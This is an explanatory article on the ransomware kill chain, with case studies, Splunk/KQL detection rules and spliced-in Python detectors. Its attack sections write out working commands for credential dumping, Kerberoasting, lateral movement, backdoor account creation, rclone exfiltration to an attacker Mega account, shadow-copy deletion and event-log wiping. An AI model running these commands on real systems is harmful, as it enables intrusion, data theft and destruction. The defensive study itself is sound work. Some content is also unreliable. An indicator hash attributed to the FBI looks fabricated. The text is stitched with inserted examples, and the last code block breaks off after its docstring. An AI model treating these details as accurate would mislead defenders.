Anatomy of a Ransomware Attack
Key Takeaways
- Ransomware is malware that encrypts a victim's files and demands cryptocurrency payment for the decryption key.
- Modern ransomware operations follow a consistent pattern that maps directly to the MITRE ATT&CK framework.
- Conti was the most prolific and operationally sophisticated ransomware group before its dissolution in May 2022 following its own internal data being leaked (ironically, by a Ukrainian member after the group publicly sided with Russia).
- By the time files begin encrypting, the intrusion has usually been ongoing for days.
- The standard 3-2-1 rule (3 copies, 2 media types, 1 offsite) is insufficient against modern ransomware.
- The first minutes after ransomware discovery are the highest-leverage window.
On May 7, 2021, Colonial Pipeline — operator of 5,500 miles of pipeline supplying 45% of the East Coast's fuel — shut down operations after detecting ransomware on their network. The initial access vector: a single compromised VPN account with no multi-factor authentication. The attacker group, DarkSide, had been inside the network for weeks. The ransom paid: $4.4 million in Bitcoin. The economic disruption: panic buying across the Southeast United States, stations running dry, the Biden administration invoking emergency regulations to allow fuel transport by road.
This was not a sophisticated nation-state attack using zero-days. It was a password in a breach database, an unprotected VPN endpoint, and an operator who knew their business model.
Ransomware is not an advanced threat. It is a systematic, scalable criminal enterprise that has extracted over $1 billion annually since 2019, targets organizations of every size, and disproportionately damages healthcare systems, schools, and municipalities. Understanding the kill chain, the threat actors, and the specific technical controls that interrupt it is the only defense that scales.
What Ransomware Is and How the Business Works
Ransomware is malware that encrypts a victim's files and demands cryptocurrency payment for the decryption key. Modern operations layer double and triple extortion on top: pay for the decryptor, pay more to prevent publication of exfiltrated data, and sometimes face DDoS attacks against external infrastructure until payment is made.
The encryption itself is not novel. Modern ransomware uses hybrid encryption:
- Attacker generates an RSA-4096 or ECC key pair on their infrastructure. The public key is embedded in the ransomware binary.
- For each encrypted file, the malware generates a unique AES-256 key using the OS's CSPRNG.
- AES-256 encrypts the file contents. AES in CBC or CTR mode can process gigabytes per second — a 1TB drive can be encrypted in under an hour.
- The AES key is encrypted with the attacker's RSA public key and stored alongside the encrypted file.
- Without the RSA private key (which never leaves the attacker's control), the AES keys cannot be recovered, and the files cannot be decrypted.
This hybrid scheme is computationally sound. There is no algorithmic shortcut. If the ransomware implementation is correct, files cannot be recovered without the private key. The only paths to recovery are: paying the ransom (unreliable), law enforcement recovering the private key (rare), clean backups, or decryptors released after operator infrastructure is seized.
The Ransomware-as-a-Service Model
Modern ransomware does not require technical sophistication to deploy. RaaS platforms function like SaaS businesses:
```text
Core Developers → Build and maintain malware, infrastructure, negotiation portals
        ↓
RaaS Platform   → Dashboard, affiliate recruitment, technical support, payment processing
        ↓
Affiliates      → Conduct intrusions, deploy ransomware, handle initial negotiation
        ↓
Revenue Split   → Core team: 20-30%, Affiliates: 70-80%
```
LockBit, at its peak (2022-2024), had an affiliate program with hundreds of active members. Affiliates received a ready-to-use ransomware binary, a negotiation portal, a data leak site, and technical support. The affiliate's only job was gaining initial access and deploying the payload. This separation between development and execution explains why infrastructure takedowns are temporary — the affiliates simply move to competing platforms.
MITRE ATT&CK Mapping: The Full Kill Chain
Modern ransomware operations follow a consistent pattern that maps directly to the MITRE ATT&CK framework. Understanding each stage reveals the intervention points.
TA0001: Initial Access
Ransomware intrusions start through a small set of well-documented vectors. Mandiant's M-Trends 2024 report found:
- Exploits (38%): Vulnerabilities in internet-facing systems — VPNs, firewalls, remote access appliances
- Phishing (17%): Malicious attachments or links; increasingly HTML smuggling and ISO/IMG files
- Prior compromises (15%): Existing access sold by initial access brokers (IABs) on dark web forums
- Valid accounts (13%): Credentials from breaches, credential stuffing, or previously phished accounts
Key CVEs exploited in ransomware intrusions (2021-2024):
| CVE | Affected Product | Exploited By | CVSS |
|---|---|---|---|
| CVE-2021-20016 | SonicWall SMA100 | Multiple groups | 9.8 |
| CVE-2021-34527 | Windows Print Spooler (PrintNightmare) | Multiple | 8.8 |
| CVE-2021-44228 | Log4Shell (Apache Log4j) | Multiple | 10.0 |
| CVE-2022-30190 | Microsoft Follina (MSDT) | Multiple | 7.8 |
| CVE-2023-4966 | Citrix Bleed (NetScaler) | LockBit 3.0 | 9.4 |
| CVE-2023-20198 | Cisco IOS XE Web UI | Multiple | 10.0 |
| CVE-2023-22515 | Confluence Data Center | STORM-0062/LockBit | 10.0 |
| CVE-2024-3400 | Palo Alto PAN-OS | Multiple | 10.0 |
The median time from public disclosure to ransomware exploitation dropped to 5 days in 2024 for critical severity vulnerabilities in perimeter devices. VPNs, firewalls, and remote access appliances are the primary targets because they are internet-facing, often underpatched, and provide direct internal network access upon exploitation.
Phishing delivery evolution: Modern ransomware phishing has abandoned macro-laden Office documents (disabled by default in Office 2022+) in favor of:
```text
# Modern phishing delivery chain:
1. Email with HTML attachment or link
2. HTML file uses smuggling to decode/drop an ISO/IMG file
3. ISO auto-mounts in Windows 10+ (no prompt)
4. Inside ISO: LNK shortcut + DLL
5. LNK file executes: rundll32.exe malware.dll,EntryPoint
6. DLL loads: Cobalt Strike/Brute Ratel/Sliver stager in memory
7. No .exe, no obvious malware file on disk
```
Initial Access Broker (IAB) ecosystem: Before deploying ransomware, attackers frequently purchase existing access from IABs on forums like RAMP and Exploit.in. IABs maintain ongoing access to corporate networks (RDP credentials, compromised VPN accounts, persistent web shells) and auction them. A single IAB listing for "Fortune 500 company, domain admin access, 5000 endpoints" might sell for $50,000-$100,000 — a small fraction of the eventual ransomware demand.
TA0002: Execution and TA0003: Persistence
Once inside, the attacker deploys a command-and-control implant and establishes persistence to survive detection and reboots.
Common C2 frameworks used in pre-ransomware intrusions:
| Framework | Type | Detection Difficulty |
|---|---|---|
| Cobalt Strike | Commercial (cracked) | Moderate — signatures exist |
| Brute Ratel C4 | Commercial (purchased) | High — less detection coverage |
| Sliver | Open source | Moderate |
| Mythic | Open source | Moderate |
| Havoc | Open source | Lower |
Cobalt Strike "beaconing" — the periodic check-in to the C2 server — is detectable via network analysis. Beacon intervals are typically configurable between 60 seconds and 24 hours, with jitter to avoid regular timing signatures.
Persistence mechanisms (MITRE T1053, T1543, T1547):
```text
# Scheduled task persistence (T1053.005)
schtasks /create /tn "WindowsUpdateChecker" /tr "C:\Users\Public\update.exe" /sc ONLOGON /ru SYSTEM

# Registry Run key (T1547.001)
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHelper" /t REG_SZ /d "C:\ProgramData\helper.exe"

# WMI event subscription (T1546.003) — harder to detect (PowerShell)
$filter = ([wmiclass]"\\.\root\subscription:__EventFilter").CreateInstance()
$filter.Name = "SystemUpdate"
$filter.EventNamespace = "root\cimv2"
$filter.QueryLanguage = "WQL"
$filter.Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"
$filter.Put()
# ... (consumer and binding omitted for brevity)

# Service installation (T1543.003)
sc create WindowsAudioManager binpath= "C:\ProgramData\svc.exe" start= auto
sc start WindowsAudioManager
```

Dwell time — the period between initial access and ransomware deployment — averaged 9 days in 2023 (Sophos Active Adversary Report 2024). Some sophisticated operations dwell for 30+ days, thoroughly mapping the environment before striking. Shorter dwell times (under 24 hours) are associated with opportunistic attacks on easy targets.
TA0004: Privilege Escalation
Local user access is insufficient for a widespread encryption attack. Domain Administrator (or equivalent) is required to push the encryptor to every machine simultaneously.
Primary privilege escalation techniques:
LSASS credential dumping (T1003.001):
```text
# The classic: Mimikatz extracts NTLM hashes and plaintext passwords
# from LSASS memory (requires SYSTEM or SeDebugPrivilege)
mimikatz # sekurlsa::logonpasswords

# Modern alternative: dump LSASS process memory, analyze offline
# (avoids touching disk with the mimikatz binary)
# Via Task Manager: right-click lsass.exe → Create dump file
# Via comsvcs.dll (LOLBin):
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <LSASS_PID> C:\Windows\Temp\lsass.dmp full
# Via Sysinternals ProcDump (legitimate tool):
procdump.exe -ma lsass.exe lsass.dmp
```
Kerberoasting (T1558.003): Service accounts with SPNs configured can have their Kerberos tickets requested by any domain user. The ticket is encrypted with the service account's password hash and can be cracked offline.
```text
# Request Kerberoastable tickets (Impacket)
GetUserSPNs.py domain.local/normaluser:password -dc-ip 10.0.0.1 -request

# PowerShell (Invoke-Kerberoast)
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -FilePath kerberoast.txt

# Then crack with hashcat
hashcat -m 13100 kerberoast.txt rockyou.txt -r rules/best64.rule
```

Key CVEs used for privilege escalation in ransomware intrusions:
- ZeroLogon (CVE-2020-1472): Allows any network-connected attacker to set the Domain Controller's computer account password to empty, gaining DA instantly. Conti used this extensively in 2021.
- PrintNightmare (CVE-2021-34527): Allows remote code execution with SYSTEM privileges via the Windows Print Spooler service. Virtually all major ransomware groups used this in 2021.
- HiveNightmare/SeriousSAM (CVE-2021-36934): Non-admin users can read the SAM, SYSTEM, and SECURITY registry hives, allowing offline credential extraction. Patched in August 2021 but widely unpatched for months.
TA0008: Lateral Movement
With elevated credentials, operators move laterally using native Windows administration tools — "living off the land" (LOLBins) to blend with legitimate administrative traffic.
Common lateral movement techniques:
```text
# PsExec — execute commands remotely (T1570)
PsExec.exe \\TARGET_HOST -u DOMAIN\admin -p password cmd.exe
PsExec.exe -accepteula \\10.0.0.50 cmd.exe

# WMI remote execution (T1021.006)
wmic /node:10.0.0.50 /user:DOMAIN\admin /password:password process call create "cmd.exe /c net user backdoor P@ss1234 /add"

# WinRM (T1021.006)
Enter-PSSession -ComputerName TARGET -Credential DOMAIN\admin
Invoke-Command -ComputerName TARGET -ScriptBlock { whoami }

# SMB with pass-the-hash (T1550.002)
# Using Impacket's smbexec with NTLM hash instead of password
smbexec.py -hashes :NTLM_HASH DOMAIN/admin@10.0.0.50

# RDP (T1021.001)
# Standard RDP with compromised credentials
mstsc /v:10.0.0.50
```

During lateral movement, attackers enumerate:
```text
# Network enumeration
net view /domain                         # List domains
net group "Domain Computers" /domain     # All computers
net group "Domain Admins" /domain        # DA accounts

# Share enumeration
net view \\FILESERVER01
net use Z: \\FILESERVER01\share          # Mount network share

# Find backup servers (high priority targets)
net group "Backup Operators" /domain
ping veeam01.domain.local
nslookup backup                          # DNS lookup for backup hostnames

# EDR/AV discovery (to evade or disable)
sc query type= all | findstr "CrowdStrike\|SentinelOne\|Carbon Black"
wmic /node:localhost product where "name like '%CrowdStrike%'" get name
```

The highest-value detection opportunity in most environments is lateral movement, not the initial compromise. Cobalt Strike beaconing from a single workstation can evade detection for days. The same beacon authenticating to 50 hosts via SMB within an hour is a screaming indicator. Alert on: any single host making new SMB connections to more than 10 unique internal hosts within 60 minutes.
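The 10-hosts-in-60-minutes rule just stated, implemented as a sliding-window detector over constructed Windows 4624 network-logon records. This is an added example, not code from the page; the record format, account names and addresses are assumptions, and the sample includes a scheduled scanner that touches many hosts slowly to show why the window matters.

```python
"""Sliding-window detector for the lateral-movement rule above: alert when one
account/source pair logs on (Windows event 4624, Logon_Type=3) to more than
10 unique internal hosts within 60 minutes. Added example; every record below
is constructed, not real telemetry."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=60)
UNIQUE_HOST_THRESHOLD = 10   # alert when distinct targets inside WINDOW exceed this


def parse_4624(line):
    """Parse one constructed record: '<iso time> <target host> <account> <src ip>'."""
    ts, host, account, src = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), host.upper(), account.lower(), src


def constructed_log():
    """Three actors: a normal user, a scheduled vulnerability scanner and a
    compromised service account fanning out across workstations."""
    base = datetime(2024, 3, 1, 9, 0, 0)
    lines = []
    # jsmith touches three shares over the morning: no alert.
    for i, host in enumerate(["FILESERVER01", "PRINT01", "FILESERVER02"]):
        lines.append(f"{(base + timedelta(minutes=15 * i)).isoformat()} {host} jsmith 10.1.0.25")
    # svc_scan reaches 15 servers, but only one every 20 minutes: never more
    # than 4 distinct hosts inside any 60-minute window, so no alert.
    for i in range(15):
        lines.append(f"{(base + timedelta(minutes=20 * i)).isoformat()} SRV{i:02d} svc_scan 10.4.0.10")
    # svc_backup authenticates to 12 workstations in 33 minutes: alert.
    for i in range(12):
        lines.append(f"{(base + timedelta(hours=2, minutes=3 * i)).isoformat()} WS{i:03d} svc_backup 10.1.0.77")
    return lines


def detect_lateral_movement(lines, window=WINDOW, threshold=UNIQUE_HOST_THRESHOLD):
    """Return one alert per (account, source) whose distinct target hosts within
    any `window` exceed `threshold`. Input may be unsorted; each pair alerts once."""
    events = sorted(parse_4624(l) for l in lines if l.strip())
    recent = defaultdict(deque)          # (account, src) -> deque[(time, host)] in window
    alerts = {}
    for ts, host, account, src in events:
        key = (account, src)
        q = recent[key]
        q.append((ts, host))
        while ts - q[0][0] > window:     # evict logons older than the window
            q.popleft()
        unique_hosts = {h for _, h in q}
        if len(unique_hosts) > threshold and key not in alerts:
            alerts[key] = {
                "account": account,
                "source": src,
                "window_start": q[0][0],
                "fired_at": ts,
                "unique_targets": len(unique_hosts),
                "targets": sorted(unique_hosts),
            }
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_lateral_movement(constructed_log()):
        print(f"ALERT {a['account']}@{a['source']}: {a['unique_targets']} hosts "
              f"between {a['window_start']:%H:%M} and {a['fired_at']:%H:%M}")
```

Lowering the threshold to 3 makes the scanner alert too, which is the tuning trade-off a real deployment has to settle with an allow-list for known scanners.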
TA0009: Collection and TA0010: Exfiltration
Before encrypting, attackers exfiltrate data. This enables double extortion: even victims with perfect backups must pay to prevent data publication.
Data staging:
```text
# Identify high-value data first
dir /s /b *.pdf *.docx *.xlsx *.sql *.bak C:\
dir /s /b *financial* *salary* *password* *confidential* Z:\   # Network shares

# Compress and stage for exfiltration
7z a -mmt=8 -mx=1 staged_data.zip C:\staged\ \\FILESERVER01\share\

# Compress with password to evade DLP
7z a -p"ExfilPass2024" -mmt=8 data.7z \\FILESERVER01\Finance\
```

Exfiltration tools seen in pre-ransomware operations:
| Tool | Technique | Detection |
|---|---|---|
| Rclone | Syncs to attacker-controlled cloud (Mega, S3) | Outbound HTTPS to cloud providers; unusual rclone.conf |
| MEGAsync | Uploads to MEGA.nz | HTTPS to MEGA endpoints |
| WinSCP | SFTP to attacker server | Outbound port 22 from servers |
| FileZilla | FTP | Outbound port 21 |
| Cobalt Strike upload | C2 channel | Unusual C2 beacon activity |
```ini
# Rclone configuration file (found in memory or AppData after incident)
# This exfiltrated data to attacker-controlled Mega account:
[mega_remote]
type = mega
user = attacker@protonmail.com
pass = <encrypted>
# Used like:
# rclone copy Z:\Finance mega_remote:stolen/ --transfers 10 --no-traverse
```

TA0040: Impact — Encryption and Extortion
When the operator is ready to encrypt, they execute the final phase simultaneously across all compromised hosts. This is why ransomware is so destructive — it is not a slow, sequential process but a coordinated simultaneous strike.
Pre-encryption actions:
```text
# Delete Volume Shadow Copies (T1490) — most reliable last-mile indicator
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no

# Disable Windows Recovery features
schtasks /Change /TN "Microsoft\Windows\SystemRestore\SR" /DISABLE
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wbengine" /v Start /t REG_DWORD /d 4 /f

# Stop backup services
net stop vss
net stop SQLWriter
net stop "Volume Shadow Copy"
net stop "Windows Backup"
net stop Veeam*

# Clear event logs (evidence destruction)
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
```

vssadmin delete shadows /all /quiet appearing in any process execution log is one of the most reliable ransomware indicators that exist. By the time this executes, the attack is in its final phase. Immediate isolation of all affected hosts is the only response. Automated alerting on this command — with automatic host isolation triggered through EDR — should be standard in any environment that takes ransomware seriously.
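The pre-encryption commands above, turned into a command-line matcher that runs over constructed process-creation records and decides which hosts merit automatic isolation. This is an added example, not the page's code; the rule names, the tab-separated record format, the account names and the two-rule isolation threshold are this example's own choices.

```python
"""Matcher for the pre-encryption command lines described above (shadow copy
deletion, recovery disabled, backup services stopped, event logs cleared),
run over constructed process-creation records. Added example, not from the
original page; rule names, the record format and the isolation threshold are
this example's own choices."""
import re
from collections import defaultdict

# (rule name, severity, ATT&CK technique, pattern over the normalised command line)
RULES = [
    ("shadow_copy_delete_vssadmin", "CRITICAL", "T1490",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b")),
    ("shadow_copy_delete_wmic", "CRITICAL", "T1490",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b")),
    ("recovery_disabled_bcdedit", "CRITICAL", "T1490",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\b(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b")),
    ("backup_service_stop", "HIGH", "T1489",
     re.compile(r"\bnet1?(?:\.exe)?\s+stop\s+[\"']?(?:vss|sqlwriter|volume shadow copy|windows backup|veeam)")),
    ("event_log_clear", "HIGH", "T1070.001",
     re.compile(r"\bwevtutil(?:\.exe)?\b.*\b(?:cl|clear-log)\b")),
]

# Constructed 4688-style records: time <TAB> host <TAB> user <TAB> command line.
# FS01 shows a backup job rotating its own shadow copies; WS042 shows the
# full pre-encryption sequence from the text, with case and spacing varied.
SAMPLE_LOG = (
    "2024-03-01T02:00:00\tFS01\tDOMAIN\\backupadm\tvssadmin delete shadows /for=D: /oldest\n"
    "2024-03-01T11:30:02\tWS042\tDOMAIN\\svc_backup\tC:\\Windows\\System32\\vssadmin.exe list shadows\n"
    "2024-03-01T11:32:07\tWS042\tDOMAIN\\svc_backup\tVSSADMIN.EXE  Delete   Shadows /All /Quiet\n"
    "2024-03-01T11:32:09\tWS042\tDOMAIN\\svc_backup\twmic shadowcopy delete\n"
    "2024-03-01T11:32:11\tWS042\tDOMAIN\\svc_backup\tbcdedit /set {default} recoveryenabled no\n"
    "2024-03-01T11:32:15\tWS042\tDOMAIN\\svc_backup\tnet stop \"Volume Shadow Copy\"\n"
    "2024-03-01T11:32:20\tWS042\tDOMAIN\\svc_backup\twevtutil.exe el\n"
    "2024-03-01T11:32:21\tWS042\tDOMAIN\\svc_backup\twevtutil.exe cl \"Security\"\n"
    "2024-03-01T11:35:00\tFS01\tDOMAIN\\backupadm\twmic shadowcopy list brief\n"
)


def normalise(cmdline):
    """Lower-case and collapse whitespace so spacing/case tricks do not evade the patterns."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def match_rules(cmdline):
    norm = normalise(cmdline)
    return [(name, sev, tech) for name, sev, tech, rx in RULES if rx.search(norm)]


def scan_log(text):
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmd = line.split("\t", 3)
        for name, sev, tech in match_rules(cmd):
            hits.append({"time": ts, "host": host, "user": user, "rule": name,
                         "severity": sev, "technique": tech, "cmdline": cmd})
    return hits


def hosts_to_isolate(hits, min_critical_rules=2):
    """Hosts where at least `min_critical_rules` distinct CRITICAL rules fired.
    Every hit is still alerted; this threshold only decides which hosts go
    straight to EDR isolation (one rotation of old shadow copies by a backup
    job looks different from several recovery-destroying commands in a row)."""
    critical = defaultdict(set)
    for h in hits:
        if h["severity"] == "CRITICAL":
            critical[h["host"]].add(h["rule"])
    return {host for host, rules in critical.items() if len(rules) >= min_critical_rules}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h['time']} {h['host']:6} {h['severity']:8} {h['rule']:28} {h['cmdline']}")
    print("isolate:", sorted(hosts_to_isolate(found)))
```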
Distribution of the encryptor:
```text
# Group Policy deployment (T1484.001)
# Attacker with DA creates a new GPO linked to all OUs
# GPO runs encryptor as a logon/startup script

# PsExec batch deployment
# Iterate through list of hosts, push encryptor via PsExec
for /F %%i in (hosts.txt) do (
    PsExec.exe \\%%i -s -d C:\Windows\Temp\svc.exe
)

# WMI simultaneous deployment
# From ransomware group playbook analysis by CISA/FBI advisories
```

Ransom note content and negotiation portal:
```text
# Typical ransom note structure (composite from multiple incidents):
YOUR FILES HAVE BEEN ENCRYPTED
Company: [VICTIM COMPANY NAME]
Date: [DATE]
Victim ID: [UNIQUE ID]

Do not rename or move encrypted files.
Do not attempt to decrypt with third-party software — permanent damage will result.

To recover your files:
1. Visit our portal: http://[REDACTED].onion/[VICTIM_ID]
2. You have 72 hours before the price doubles
3. After 120 hours, your data will be published

WHAT WAS STOLEN: We have exfiltrated 2.3 TB of your data including:
- Financial records (Q1-Q4 2023)
- Employee PII and payroll data
- Customer database
- Intellectual property and source code
```
Case Studies: Detailed Technical Breakdowns
Conti Ransomware Group (2020–2022)
Conti was the most prolific and operationally sophisticated ransomware group before its dissolution in May 2022 following its own internal data being leaked (ironically, by a Ukrainian member after the group publicly sided with Russia).
The Conti playbook (documented after the leak revealed internal training materials):
Initial access: Purchase RDP or VPN access from IABs ($300-$30,000), or conduct spear phishing with BazarLoader/TrickBot malware. TrickBot was specifically used to identify high-value targets: it would collect domain information, Active Directory details, and network maps before selling the access to Conti.
Post-compromise toolkit:
- Cobalt Strike (for C2 and lateral movement)
- Mimikatz (credential dumping)
- BloodHound/SharpHound (AD enumeration — graphed shortest path to DA)
- ADFind (Active Directory enumeration)
- Rclone (data exfiltration)
- LockBit/Conti encryptor (deployment)
HSE Ireland (May 2021): Conti's attack on Ireland's Health Service Executive is one of the most documented healthcare ransomware incidents. Initial access: phishing email to an HSE workstation. Dwell time: approximately 8 weeks. The attackers mapped the entire HSE network, identified backup infrastructure, and moved laterally to over 80,000 endpoints. The encryption event forced Ireland's national healthcare system to cancel tens of thousands of appointments and revert to paper systems. Recovery cost: approximately €100 million over 18 months. The decryption tool was provided for free by Conti after international pressure — unusual behavior that reflected the political fallout from attacking national healthcare.
Costa Rica (April 2022): Conti attacked multiple Costa Rican government agencies simultaneously, demanding $20 million (later raised to $50 million), and declared "war" on the country when it refused to pay. This triggered a US State Department declaration that the attack qualified as a national emergency and a $15 million reward for information on Conti leadership.
FBI FLASH Technical Indicators (from FBI PIN 20220504):
```text
# Conti IOCs
c2_domains:
  - rebrandly.com/                        # Used for initial C2 redirect
  - *.xyz (multiple)
file_hashes_md5:
  - 3c6d6f8e8da50f4d3c57a7c12e5bd9d3      # Conti encryptor variant
  - a4f3e8b2c1d9a7f6e5d4c3b2a1908172      # BazarLoader variant
registry_keys:
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DHCP Service
processes:
  - conti.exe
  - locker.exe (various names)
  - bazar.exe
network_indicators:
  - TOR connections (port 9001, 9030)
  - Cobalt Strike C2 on port 443, 80 (malleable C2)
```

LockBit (2019–2024)
LockBit became the world's most prolific ransomware operation, claiming over 2,000 confirmed victims across its LockBit 2.0 and LockBit 3.0 versions. The group was remarkable for its:
- Speed: LockBit 3.0 was reportedly the fastest ransomware ever created, using multithreading and I/O optimization to encrypt targets faster than defenders could respond
- Affiliate model: Rigorous vetting of affiliates, detailed technical documentation, and a bug bounty program offering up to $1 million for vulnerabilities in their platform
- PR operations: Active communications with journalists, attempted recruitment of victim company insiders, and public shaming of slow-paying victims
Technical innovation in LockBit 3.0 (released 2022):
- Encrypted configuration (RC4): obfuscates target lists and exclusions
- "Intermittent encryption": encrypts only the first 4096 bytes of large files
  → 40-60% faster encryption, files still effectively unreadable
- Pass-the-hash support: can use NTLM hashes directly without cleartext password
- Wake-on-LAN: sends WoL packets to power on sleeping machines before encrypting
- Polymorphic encryption of the binary: each build is unique, evading static signatures
- PrintNightmare exploitation built into the binary
Operation Cronos (February 2024): Law enforcement from 11 countries — Europol, FBI, NCA, and others — seized LockBit's infrastructure, took control of their dark web sites, and arrested or identified several operators. Prosecutors released decryption keys for approximately 1,000 victims. LockBit's administrator, "LockBitSupp," was identified as Dmitry Khoroshev, a 31-year-old Russian national, with a $10 million reward issued.
Within 5 days of the takedown, LockBit relaunched on new infrastructure. The affiliates — who were never arrested — continued operations. This illustrates the structural resilience of the RaaS model: dismantling the core does not eliminate the distributed affiliate network.
BlackCat / ALPHV (2021–2024)
BlackCat/ALPHV was notable for being the first major ransomware written in Rust (unusual choice that improved cross-platform compatibility and evaded some AV detection) and for the sophistication of its affiliate-targeting portal.
MGM Resorts (September 2023):
The MGM attack by Scattered Spider (an ALPHV affiliate) used pure social engineering for initial access:
Timeline:
- September 11, 2023: Scattered Spider conducts OSINT on MGM IT staff via LinkedIn
- September 11: 10-minute phone call to MGM helpdesk impersonating an IT employee
- Helpdesk resets credentials, provides VPN access
- Hours later: ALPHV ransomware deployed across MGM's Okta identity platform
  → All MGM properties affected: Las Vegas casinos, hotels
- September 11-20: MGM refuses to pay ransom
- Total impact: $100M+ in direct costs, 10+ days of disruption
  → Slot machines down, hotel key cards failed, restaurant systems offline
  → MGM's estimated total cost including lost revenue: ~$100M
- Parallel: Caesars Entertainment paid approximately $15M ransom in September 2023 after a similar Scattered Spider attack, which was not disclosed until required by the SEC
ALPHV Healthcare Attack (February 2024):
UnitedHealth Group's subsidiary Change Healthcare processed 15 billion healthcare transactions annually — approximately 50% of US medical claims. ALPHV/Scattered Spider gained access through Citrix infrastructure without MFA and deployed ransomware on February 21, 2024.
Effects:
- Pharmacies across the US unable to process insurance claims
- Hospitals unable to verify patient insurance
- $22 million ransom allegedly paid
- Estimated $872 million in direct costs reported by UnitedHealth in Q1 2024 earnings
- CEO Andrew Witty testified to Congress that attackers entered via credentials with no MFA
ALPHV then conducted an exit scam — shut down their RaaS platform while keeping the $22M payment, cheating their own affiliates. This destabilized the ransomware ecosystem temporarily before RansomHub and other groups absorbed ALPHV's affiliates.
Detection: Finding Ransomware Before Files Encrypt
By the time files begin encrypting, the intrusion has usually been ongoing for days. Effective ransomware defense requires detecting the precursor behaviors, not the encryption event.
SIEM Detection Rules
Splunk SPL — Detect vssadmin shadow copy deletion (schedule this search as a Splunk alert; there is no "| alert" search command):

```spl
index=windows source="WinEventLog:Security" EventCode=4688
    (CommandLine="*vssadmin*delete*shadows*" OR CommandLine="*wmic*shadowcopy*delete*")
| table _time, Computer, Account_Name, CommandLine
| eval severity="CRITICAL"
```

Splunk SPL — Detect mass SMB lateral movement (the 60-minute window is enforced by bucketing on _time rather than by a label field):

```spl
index=windows source="WinEventLog:Security" EventCode=4624 Logon_Type=3
| bin _time span=60m
| stats count dc(Computer) as unique_targets by _time, Account_Name, Source_Network_Address
| where unique_targets > 10 AND count > 20
| table _time, Account_Name, Source_Network_Address, unique_targets, count
```

Splunk SPL — Detect Cobalt Strike beacon patterns:
```spl
index=network sourcetype=zeek_dns
| eval domain_length=len(query)
| where domain_length > 25
| eval entropy=... (Shannon entropy calculation)
| where entropy > 3.5
| stats count by query, src
| where count > 10
```

KQL (Microsoft Sentinel) — Detect LSASS memory access:
```kql
// Access to the LSASS process is recorded in DeviceEvents (OpenProcessApiCall);
// DeviceProcessEvents only lists processes being created, so filtering it on
// FileName == lsass.exe would never show a dumping tool opening LSASS.
DeviceEvents
| where ActionType == "OpenProcessApiCall"
| where FileName =~ "lsass.exe"
| where InitiatingProcessFileName !in~ ("MsMpEng.exe", "csrss.exe", "wininit.exe",
    "CrowdStrike.exe", "SentinelAgent.exe", "MBAMService.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
```

KQL — Detect volume shadow copy deletion:
```kql
DeviceProcessEvents
| where ProcessCommandLine has_any ("vssadmin", "wmic shadowcopy", "bcdedit")
| where ProcessCommandLine has_any ("delete", "shadows", "recoveryenabled")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
```

KQL — Detect Rclone exfiltration:
```kql
// DeviceNetworkEvents already carries the initiating process, so no join is
// needed; a join keyed on an exact Timestamp match between two tables would
// almost never pair the process-creation row with its network rows.
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "rclone.exe"
| where RemotePort == 443
| project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrl, InitiatingProcessCommandLine
| order by Timestamp desc
```

KQL — Detect rapid file encryption (file extension changes):
```kql
DeviceFileEvents
| where ActionType == "FileRenamed"
| where FileName matches regex @"\.\w{4,8}$" // Encrypted extension
| summarize count() by bin(Timestamp, 1m), DeviceName, InitiatingProcessFileName
| where count_ > 100 // 100+ file renames in 1 minute
| order by count_ desc
```

Behavioral Indicators by Stage
Early detection (hours-days before encryption):
HIGH PRIORITY ALERTS:
✓ Cobalt Strike named pipe: \\.\pipe\MSSE-*-server (T1573)
✓ LSASS accessed by non-system process with SeDebugPrivilege
✓ New scheduled task created in SYSTEM context
✓ BloodHound/SharpHound execution (T1482)
✓ ADFind execution (T1018)
✓ Single host accessing >10 SMB shares in 60 minutes
✓ Service account authenticating to workstations (vs servers)
✓ PowerShell executing Base64-encoded commands (very common in legitimate use but useful in combination)
MEDIUM PRIORITY:
✓ Rclone or MEGAsync binary execution on servers
✓ 7-Zip compression of large file sets
✓ External RDP connections from new source IPs
✓ New local admin account creation
Late detection (hours before encryption):
CRITICAL - IMMEDIATE RESPONSE:
✓ vssadmin delete shadows
✓ wmic shadowcopy delete
✓ bcdedit /set recoveryenabled no
✓ net stop vss / net stop SQLWriter
✓ wevtutil cl (event log clearing)
✓ Mass file rename activity (>100 files/minute same process)
✓ .locked / .encrypted / .LOCKED extension appearing in file events
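The Shannon entropy step that the Cobalt Strike beacon SPL above leaves as "...", carried through in Python over constructed Zeek-style DNS records with the same thresholds (length > 25, entropy > 3.5, count > 10). This is an added example, not the page's code; it scores the leftmost label rather than the whole query name, because long but ordinary hostnames such as fileserver01.corp.example-company.com score above 3.5 when measured whole. The record format, addresses and domain names are constructed.

```python
"""Shannon-entropy scoring for the beacon-detection SPL above, applied to
constructed Zeek-style DNS records. Added example, not from the original page.
The leftmost DNS label is scored, not the whole name (see lead-in)."""
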